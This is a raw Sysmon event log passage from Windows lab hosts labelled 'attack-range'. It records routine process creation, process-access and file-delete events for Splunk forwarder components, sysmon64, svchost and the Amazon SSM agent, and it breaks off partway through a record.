154100x8000000000000000222210Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.682{4F8D34B0-18C8-6216-3305-000000003902}1828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000222209Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.414{4F8D34B0-18C8-6216-3205-000000003902}40761884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222208Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18C8-6216-3205-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222207Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222206Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222205Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222204Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222203Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222202Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222201Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222200Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222199Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222198Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-18C8-6216-3205-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222197Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.180{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-18C8-6216-3205-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222196Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.181{4F8D34B0-18C8-6216-3205-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222195Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.108{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=619F2E0F514983373D164859BFF4180D,SHA256=A4673A6D2B32DF740E18EAB28245754A7C58B463AD2856560A06FC9EB1A1F72F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222194Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:44.078{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-164MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222226Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:45.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=381233CBEBF353BAE7816830E3884B47,SHA256=77BC4500FEFD1B1A95008E907B775DFABF0FA753A1D5CAEBBEDB33B74F145C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222225Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:45.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3CC46FE16A8FA6FE3E83DD3D43AEF45,SHA256=346774E1E49EAA879203987F1A94F391F44116F9F6A4478AC54AFDAB3AFD32DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222224Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:45.226{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B83C74969CDA8525CB94DC83B1D803A3,SHA256=DC71D239AE2FBF22A4524F502C3BBC35DE1952322730A55C888853CC3CA6C4CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298396Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:21:45.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BA0FBE7059A72F835CA8A13286F9C8D,SHA256=76865C658ACC8E1BE5C42DCCEC8884559DC7FBD055BB9FAE307C44BAE890CE62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222223Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:45.087{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-165MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.665{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-18CA-6216-3405-000000003902}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222238Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222237Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222236Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222235Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:21:46.618{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222234Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 